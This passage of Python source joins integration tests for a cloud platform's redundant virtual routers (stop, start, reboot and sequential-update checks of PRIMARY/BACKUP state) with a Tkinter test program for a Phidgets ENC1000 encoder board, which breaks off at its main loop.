'UNKNOWN', 'FAULT'], "Redundant state of the primary router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.debug("Starting the old PRIMARY router")
try:
Router.start(self.apiclient, id=primary_router.id)
self.debug("old PRIMARY router started")
except Exception as e:
self.fail("Failed to start primary router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_02_stopBackupRvR(self):
"""Test stop backup RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. stopRouter that is BACKUP. Router goes to stopped state
# successfully
# 6. listRouters in the account and in the network. Lists old PRIMARY
# router in redundantstate=UNKNOWN
# 7. start the stopped router. Stopped rvr starts up successfully and
# is in Running state
# 8. listRouters in the account and in the network. Router shows up as
# BACKUP and NOT PRIMARY, should have only one BACKUP and one PRIMARY
# at the end, public IP of the SourceNAT should remain same after
# reboot
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Stopping the BACKUP router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop backup router: %s" % e)
# wait for VR update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
'UNKNOWN', 'FAULT'], "Redundant state of the backup router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.debug("Starting the old BACKUP router")
try:
Router.start(self.apiclient, id=backup_router.id)
self.debug("old BACKUP router started")
except Exception as e:
self.fail("Failed to stop primary router: %s" % e)
# wait for VR to start and update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.assertEqual(
backup_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_03_rebootPrimaryRvR(self):
"""Test reboot primary RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. reboot router that is PRIMARY. Router reboots state
# successfully
# 6. lists old PRIMARY router in redundantstate=BACKUP and the old
# BACKUP router as new PRIMARY + public IP of the SourceNAT should
# remain same after the reboot
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Rebooting the primary router")
try:
Router.reboot(self.apiclient, id=primary_router.id)
except Exception as e:
self.fail("Failed to reboot PRIMARY router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_04_rebootBackupRvR(self):
"""Test reboot backup RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. reboot router that is BACKUP. Router reboots state
# successfully
# 6. lists old BACKUP router in redundantstate=BACKUP, and the old
# PRIMARY router is still PRIMARY+ public IP of the SourceNAT should
# remain same after the reboot
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Rebooting the backup router")
try:
Router.reboot(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to reboot BACKUP router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the Primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_05_stopBackupRvR_startInstance(self):
"""Test stop backup RVR and start instance
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. stop router that is BACKUP.
# 6. listRouters in the account and in the network
# 7. deployVM in the user account in the created network
# 8. listRouters in the account and in the network
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
backup_router = routers[1]
else:
backup_router = routers[0]
self.debug("Stopping the backup router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop BACKUP router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertIn(
routers[0].redundantstate,
'UNKNOWN',
"Redundant state of the backup router\
should be UNKNOWN but is %s" %
routers[0].redundantstate)
# Spawn an instance in that network
vm_2 = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
vms = VirtualMachine.list(
self.apiclient,
id=vm_2.id,
listall=True
)
self.assertEqual(
isinstance(vms, list),
True,
"List Vms should return a valid list"
)
vm = vms[0]
self.assertEqual(
vm.state,
"Running",
"Vm should be in running state after deployment"
)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
return
def updateNetwork(self, conn):
try:
self.network.update(
self.api_client,
networkofferingid=self.network_offering_for_update.id,
updateinsequence=True,
forced=True,
changecidr=False
)
except Exception as e:
conn.send("Failed to update network: %s due to %s"%(self.network.name, e))
conn.send("update Network Complete")
return
def get_primary_and_backupRouter(self):
retry = 4
primary_router = backup_router=None
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
if len(routers) < 2:
continue
if not (routers[0].redundantstate == 'PRIMARY' or routers[1].redundantstate == 'PRIMARY'):
continue;
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
break
else:
primary_router = routers[1]
backup_router = routers[0]
break
self.info("primary_router: %s, backup_router: %s" % (primary_router, backup_router))
return primary_router, backup_router
def chek_for_new_backupRouter(self,old_backup_router):
primary_router, backup_router = self.get_primary_and_backupRouter()
retry = 4
self.info("Checking if new router is getting created.")
self.info("old_backup_router:"+old_backup_router.name+" new_backup_router:"+backup_router.name)
while old_backup_router.name == backup_router.name:
self.debug("waiting for new router old router:"+backup_router.name)
retry = retry-1
if retry == 0:
break;
time.sleep(self.testdata["sleep"])
primary_router, backup_router = self.get_primary_and_backupRouter()
if retry == 0:
self.fail("New router creation taking too long, timed out")
def wait_untill_router_stabilises(self):
retry=4
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
self.info("waiting untill state of the routers is stable")
if routers[0].redundantstate != 'UNKNOWN' and routers[1].redundantstate != 'UNKNOWN':
return
elif retry==0:
self.fail("timedout while waiting for routers to stabilise")
return
time.sleep(self.testdata["sleep"])
@attr(tags=["bharat"])
def test_06_updateVRs_in_sequence(self):
"""Test update network and check if VRs are updated in sequence
"""
# Steps to validate
# update network to a new offering
# check if the primary router is running while backup is starting.
# check if the backup is running while primary is starting.
# check if both the routers are running after the update is complete.
#clean up the network to make sure it is in proper state.
self.network.restart(self.apiclient,cleanup=True)
time.sleep(self.testdata["sleep"])
self.wait_untill_router_stabilises()
old_primary_router, old_backup_router = self.get_primary_and_backupRouter()
self.info("old_primary_router:"+old_primary_router.name+" old_backup_router"+old_backup_router.name)
#chek if the network is in correct state
self.assertEqual(old_primary_router.state, "Running", "The primary router is not running, network is not in a correct state to start the test")
self.assertEqual(old_backup_router.state, "Running", "The backup router is not running, network is not in a correct state to start the test")
worker, monitor = multiprocessing.Pipe()
worker_process = multiprocessing.Process(target=self.updateNetwork, args=(worker,))
worker_process.start()
if not worker_process.is_alive():
message = monitor.recv()
if "Complete" not in message:
self.fail(message)
self.info("Network update Started, the old backup router will get destroyed and a new router will be created")
self.chek_for_new_backupRouter(old_backup_router)
primary_router, new_backup_router=self.get_primary_and_backupRouter()
#the state of the primary router should be running. while backup is being updated
self.assertEqual(primary_router.state, "Running", "State of the primary router is not running")
self.assertEqual(primary_router.redundantstate, 'PRIMARY', "Redundant state of the primary router should be PRIMARY, but it is %s"%primary_router.redundantstate)
self.info("Old backup router:"+old_backup_router.name+" is destroyed and new router:"+new_backup_router.name+" got created")
#wait for the new backup to become primary.
retry = 4
while new_backup_router.name != primary_router.name:
retry = retry-1
if retry == 0:
break
time.sleep(self.testdata["sleep"])
self.info("wating for backup router to become primary router name:"+new_backup_router.name)
primary_router, backup_router = self.get_primary_and_backupRouter()
if retry == 0:
self.fail("timed out while waiting for new backup router to change state to PRIMARY.")
#new backup router has become primary.
self.info("newly created router:"+new_backup_router.name+" has changed state to Primary")
self.info("old primary router:"+old_primary_router.name+"is destroyed")
#old primary will get destroyed and a new backup will be created.
#wait until new backup changes state from unknown to backup
primary_router, backup_router = self.get_primary_and_backupRouter()
retry = 4
while backup_router.redundantstate != 'BACKUP':
retry = retry-1
self.info("waiting for router:"+backup_router.name+" to change state to Backup")
if retry == 0:
break
time.sleep(self.testdata["sleep"])
primary_router, backup_router = self.get_primary_and_backupRouter()
self.assertEqual(primary_router.state, "Running", "State of the primary router is not running")
self.assertEqual(primary_router.redundantstate, 'PRIMARY', "Redundant state of the primary router should be PRIMARY, but it is %s"%primary_router.redundantstate)
if retry == 0:
self.fail("timed out while waiting for new backup rotuer to change state to PRIMARY.")
#the network update is complete.finally both the router should be running.
new_primary_router, new_backup_router=self.get_primary_and_backupRouter()
self.assertEqual(new_primary_router.state, "Running", "State of the primary router:"+new_primary_router.name+" is not running")
self.assertEqual(new_backup_router.state, "Running", "State of the backup router:"+new_backup_router.name+" is not running")
worker_process.join()
|
test_program_for_Phidgets1xEncoderENC1000_ReubenPython2and3Class.py | # -*- coding: utf-8 -*-
'''
Reuben Brewer, Ph.D.
reuben.brewer@gmail.com
www.reubotics.com
Apache 2 License
Software Revision F, 05/22/2022
Verified working on: Python 2.7, 3.8 for Windows 8.1, 10 64-bit and Raspberry Pi Buster (no Mac testing yet).
'''
__author__ = 'reuben.brewer'
from Phidgets1xEncoderENC1000_ReubenPython2and3Class import *
from MyPrint_ReubenPython2and3Class import *
import os, sys, platform
import time, datetime
import threading
import collections
###############
if sys.version_info[0] < 3:
from Tkinter import * #Python 2
import tkFont
import ttk
else:
from tkinter import * #Python 3
import tkinter.font as tkFont #Python 3
from tkinter import ttk
###############
###############
if sys.version_info[0] < 3:
from builtins import raw_input as input
else:
from future.builtins import input as input #"sudo pip3 install future" (Python 3) AND "sudo pip install future" (Python 2)
###############
###############
import platform
if platform.system() == "Windows":
import ctypes
winmm = ctypes.WinDLL('winmm')
winmm.timeBeginPeriod(1) #Set minimum timer resolution to 1ms so that time.sleep(0.001) behaves properly.
###############
###########################################################################################################
##########################################################################################################
def getPreciseSecondsTimeStampString():
ts = time.time()
return ts
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TestButtonResponse():
global MyPrint_ReubenPython2and3ClassObject
global USE_MYPRINT_FLAG
if USE_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.my_print("Test Button was Pressed!")
else:
print("Test Button was Pressed!")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_update_clock():
global root
global EXIT_PROGRAM_FLAG
global GUI_RootAfterCallbackInterval_Milliseconds
global USE_GUI_FLAG
global Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject
global ENCODER_OPEN_FLAG
global SHOW_IN_GUI_ENCODER_FLAG
global MyPrint_ReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
global SHOW_IN_GUI_MYPRINT_FLAG
if USE_GUI_FLAG == 1:
if EXIT_PROGRAM_FLAG == 0:
#########################################################
#########################################################
#########################################################
if ENCODER_OPEN_FLAG == 1 and SHOW_IN_GUI_ENCODER_FLAG == 1:
Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject.GUI_update_clock()
#########################################################
#########################################################
if MYPRINT_OPEN_FLAG == 1 and SHOW_IN_GUI_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.GUI_update_clock()
#########################################################
root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
#########################################################
#########################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def ExitProgram_Callback():
global EXIT_PROGRAM_FLAG
print("ExitProgram_Callback event fired!")
EXIT_PROGRAM_FLAG = 1
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_Thread():
global root
global root_Xpos
global root_Ypos
global root_width
global root_height
global GUI_RootAfterCallbackInterval_Milliseconds
global USE_TABS_IN_GUI_FLAG
################################################# KEY GUI LINE
#################################################
root = Tk()
#################################################
#################################################
#################################################
#################################################
global TabControlObject
global Tab_MainControls
global Tab_ENCODER
global Tab_MyPrint
if USE_TABS_IN_GUI_FLAG == 1:
#################################################
TabControlObject = ttk.Notebook(root)
Tab_MainControls = ttk.Frame(TabControlObject)
TabControlObject.add(Tab_MainControls, text=' Main Controls ')
Tab_ENCODER = ttk.Frame(TabControlObject)
TabControlObject.add(Tab_ENCODER, text=' ENCODER ')
Tab_MyPrint = ttk.Frame(TabControlObject)
TabControlObject.add(Tab_MyPrint, text=' MyPrint Terminal ')
TabControlObject.pack(expand=1, fill="both") # CANNOT MIX PACK AND GRID IN THE SAME FRAME/TAB, SO ALL .GRID'S MUST BE CONTAINED WITHIN THEIR OWN FRAME/TAB.
############# #Set the tab header font
TabStyle = ttk.Style()
TabStyle.configure('TNotebook.Tab', font=('Helvetica', '12', 'bold'))
#############
#################################################
else:
#################################################
Tab_MainControls = root
Tab_ENCODER = root
Tab_MyPrint = root
#################################################
#################################################
#################################################
#################################################
TestButton = Button(Tab_MainControls, text='Test Button', state="normal", width=20, command=lambda i=1: TestButtonResponse())
TestButton.grid(row=0, column=0, padx=5, pady=1)
#################################################
################################################# THIS BLOCK MUST COME 2ND-TO-LAST IN def GUI_Thread() IF USING TABS.
root.protocol("WM_DELETE_WINDOW", ExitProgram_Callback) # Set the callback function for when the window's closed.
root.title("test_program_for_Phidgets1xEncoderENC1000_ReubenPython2and3Class")
root.geometry('%dx%d+%d+%d' % (root_width, root_height, root_Xpos, root_Ypos)) # set the dimensions of the screen and where it is placed
root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
root.mainloop()
#################################################
################################################# THIS BLOCK MUST COME LAST IN def GUI_Thread() REGARDLESS OF CODE.
root.quit() #Stop the GUI thread, MUST BE CALLED FROM GUI_Thread
root.destroy() #Close down the GUI thread, MUST BE CALLED FROM GUI_Thread
#################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
if __name__ == '__main__':
#################################################
#################################################
global my_platform
if platform.system() == "Linux":
if "raspberrypi" in platform.uname(): # os.uname() doesn't work in windows
my_platform = "pi"
else:
my_platform = "linux"
elif platform.system() == "Windows":
my_platform = "windows"
elif platform.system() == "Darwin":
my_platform = "mac"
else:
my_platform = "other"
print("The OS platform is: " + my_platform)
#################################################
#################################################
#################################################
#################################################
global USE_GUI_FLAG
USE_GUI_FLAG = 1
global USE_TABS_IN_GUI_FLAG
USE_TABS_IN_GUI_FLAG = 0
global USE_ENCODER_FLAG
USE_ENCODER_FLAG = 1
global USE_MYPRINT_FLAG
USE_MYPRINT_FLAG = 1
#################################################
#################################################
#################################################
#################################################
global SHOW_IN_GUI_ENCODER_FLAG
SHOW_IN_GUI_ENCODER_FLAG = 1
global SHOW_IN_GUI_MYPRINT_FLAG
SHOW_IN_GUI_MYPRINT_FLAG = 1
#################################################
#################################################
#################################################
#################################################
global GUI_ROW_ENCODER
global GUI_COLUMN_ENCODER
global GUI_PADX_ENCODER
global GUI_PADY_ENCODER
global GUI_ROWSPAN_ENCODER
global GUI_COLUMNSPAN_ENCODER
GUI_ROW_ENCODER = 1
GUI_COLUMN_ENCODER = 0
GUI_PADX_ENCODER = 1
GUI_PADY_ENCODER = 10
GUI_ROWSPAN_ENCODER = 1
GUI_COLUMNSPAN_ENCODER = 1
global GUI_ROW_MYPRINT
global GUI_COLUMN_MYPRINT
global GUI_PADX_MYPRINT
global GUI_PADY_MYPRINT
global GUI_ROWSPAN_MYPRINT
global GUI_COLUMNSPAN_MYPRINT
GUI_ROW_MYPRINT = 2
GUI_COLUMN_MYPRINT = 0
GUI_PADX_MYPRINT = 1
GUI_PADY_MYPRINT = 10
GUI_ROWSPAN_MYPRINT = 1
GUI_COLUMNSPAN_MYPRINT = 1
#################################################
#################################################
#################################################
#################################################
global EXIT_PROGRAM_FLAG
EXIT_PROGRAM_FLAG = 0
global CurrentTime_MainLoopThread
CurrentTime_MainLoopThread = -11111.0
global StartingTime_MainLoopThread
StartingTime_MainLoopThread = -11111.0
global root
global root_Xpos
root_Xpos = 70
global root_Ypos
root_Ypos = 0
global root_width
root_width = 1920 - root_Xpos
global root_height
root_height = 1020 - root_Ypos
global TabControlObject
global Tab_MainControls
global Tab_ENCODER
global Tab_MyPrint
global GUI_RootAfterCallbackInterval_Milliseconds
GUI_RootAfterCallbackInterval_Milliseconds = 30
#################################################
#################################################
#################################################
#################################################
global Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject
global ENCODER_OPEN_FLAG
ENCODER_OPEN_FLAG = -1
global Encoder_MostRecentDict
global Encoder_MostRecentDict_EncodersList_Position_EncoderTicks
Encoder_MostRecentDict_EncodersList_Position_EncoderTicks = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Position_Rev
Encoder_MostRecentDict_EncodersList_Position_Rev = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Position_Degrees
Encoder_MostRecentDict_EncodersList_Position_Degrees = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_IndexPosition_EncoderTicks
Encoder_MostRecentDict_EncodersList_IndexPosition_EncoderTicks = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_IndexPosition_Rev
Encoder_MostRecentDict_EncodersList_IndexPosition_Rev = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_IndexPosition_Degrees
Encoder_MostRecentDict_EncodersList_IndexPosition_Degrees = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Raw
Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Raw = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_RPM_Raw
Encoder_MostRecentDict_EncodersList_Speed_RPM_Raw = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_RPS_Raw
Encoder_MostRecentDict_EncodersList_Speed_RPS_Raw = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Filtered
Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Filtered = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_RPM_Filtered
Encoder_MostRecentDict_EncodersList_Speed_RPM_Filtered = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_RPS_Filtered
Encoder_MostRecentDict_EncodersList_Speed_RPS_Filtered = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_ErrorCallbackFiredFlag
Encoder_MostRecentDict_EncodersList_ErrorCallbackFiredFlag = [-1]*1
global Encoder_MostRecentDict_Time
Encoder_MostRecentDict_Time = -11111.0
#################################################
#################################################
#################################################
#################################################
global MyPrint_ReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
MYPRINT_OPEN_FLAG = -1
#################################################
#################################################
################################################# KEY GUI LINE
#################################################
if USE_GUI_FLAG == 1:
print("Starting GUI thread...")
GUI_Thread_ThreadingObject = threading.Thread(target=GUI_Thread)
GUI_Thread_ThreadingObject.setDaemon(True) #Should mean that the GUI thread is destroyed automatically when the main thread is destroyed.
GUI_Thread_ThreadingObject.start()
time.sleep(0.5) #Allow enough time for 'root' to be created that we can then pass it into other classes.
else:
root = None
Tab_MainControls = None
Tab_ENCODER = None
Tab_MyPrint = None
#################################################
#################################################
#################################################
#################################################
global Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_GUIparametersDict
Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_ENCODER_FLAG),
("root", Tab_ENCODER), #root Tab_ENCODER
("EnableInternal_MyPrint_Flag", 1),
("NumberOfPrintLines", 10),
("UseBorderAroundThisGuiObjectFlag", 0),
("GUI_ROW", GUI_ROW_ENCODER),
("GUI_COLUMN", GUI_COLUMN_ENCODER),
("GUI_PADX", GUI_PADX_ENCODER),
("GUI_PADY", GUI_PADY_ENCODER),
("GUI_ROWSPAN", GUI_ROWSPAN_ENCODER),
("GUI_COLUMNSPAN", GUI_COLUMNSPAN_ENCODER)])
global Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_setup_dict
Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_setup_dict = dict([("GUIparametersDict", Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_GUIparametersDict),
("VINT_DesiredSerialNumber", 620554), #CHANGE THIS TO MATCH YOUR UNIQUE VINT
("VINT_DesiredPortNumber", 0), #CHANGE THIS TO MATCH YOUR UNIQUE VINT
("DesiredDeviceID", 60),
("WaitForAttached_TimeoutDuration_Milliseconds", 5000),
("NameToDisplay_UserSet", "Reuben's Test ENC1000 Board"),
("UsePhidgetsLoggingInternalToThisClassObjectFlag", 1),
("EncoderUpdateDeltaT_ms", 20),
("MainThread_TimeToSleepEachLoop", 0.001),
("EncodersList_CPR", [400]),
("EncodersList_SpeedExponentialFilterLambda", [0.1]),
("EncodersList_ElectricalIOmode", ["ENCODER_IO_MODE_PUSH_PULL"])])
#"ENCODER_IO_MODE_PUSH_PULL", "ENCODER_IO_MODE_LINE_DRIVER_2K2", "ENCODER_IO_MODE_LINE_DRIVER_10K", "ENCODER_IO_MODE_OPEN_COLLECTOR_2K2", "ENCODER_IO_MODE_OPEN_COLLECTOR_10K"
if USE_ENCODER_FLAG == 1:
try:
Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject = Phidgets1xEncoderENC1000_ReubenPython2and3Class(Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_setup_dict)
time.sleep(0.25)
ENCODER_OPEN_FLAG = Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
except:
exceptions = sys.exc_info()[0]
print("Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject __init__: Exceptions: %s" % exceptions, 0)
traceback.print_exc()
#################################################
#################################################
#################################################
#################################################
if USE_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_MYPRINT_FLAG),
("root", Tab_MyPrint),
("UseBorderAroundThisGuiObjectFlag", 0),
("GUI_ROW", GUI_ROW_MYPRINT),
("GUI_COLUMN", GUI_COLUMN_MYPRINT),
("GUI_PADX", GUI_PADX_MYPRINT),
("GUI_PADY", GUI_PADY_MYPRINT),
("GUI_ROWSPAN", GUI_ROWSPAN_MYPRINT),
("GUI_COLUMNSPAN", GUI_COLUMNSPAN_MYPRINT)])
MyPrint_ReubenPython2and3ClassObject_setup_dict = dict([("NumberOfPrintLines", 10),
("WidthOfPrintingLabel", 200),
("PrintToConsoleFlag", 1),
("LogFileNameFullPath", os.getcwd() + "//TestLog.txt"),
("GUIparametersDict", MyPrint_ReubenPython2and3ClassObject_GUIparametersDict)])
try:
MyPrint_ReubenPython2and3ClassObject = MyPrint_ReubenPython2and3Class(MyPrint_ReubenPython2and3ClassObject_setup_dict)
time.sleep(0.25)
MYPRINT_OPEN_FLAG = MyPrint_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
except:
exceptions = sys.exc_info()[0]
print("MyPrint_ReubenPython2and3ClassObject __init__: Exceptions: %s" % exceptions)
traceback.print_exc()
#################################################
#################################################
#################################################
#################################################
if USE_ENCODER_FLAG == 1 and ENCODER_OPEN_FLAG != 1:
print("Failed to open Phidgets1xEncoderENC1000_ReubenPython2and3Class.")
input("Press any key (and enter) to exit.")
sys.exit()
#################################################
#################################################
#################################################
#################################################
if USE_MYPRINT_FLAG == 1 and MYPRINT_OPEN_FLAG != 1:
print("Failed to open MyPrint_ReubenPython2and3ClassObject.")
input("Press any key (and enter) to exit.")
sys.exit()
#################################################
#################################################
#################################################
#################################################
print("Starting main loop 'test_program_for_Phidgets1xEncoderENC1000_ReubenPython2and3Class.")
StartingTime_MainLoopThread = getPreciseSecondsTimeStampString()
while(EXIT_PROGRAM_FLAG == 0):
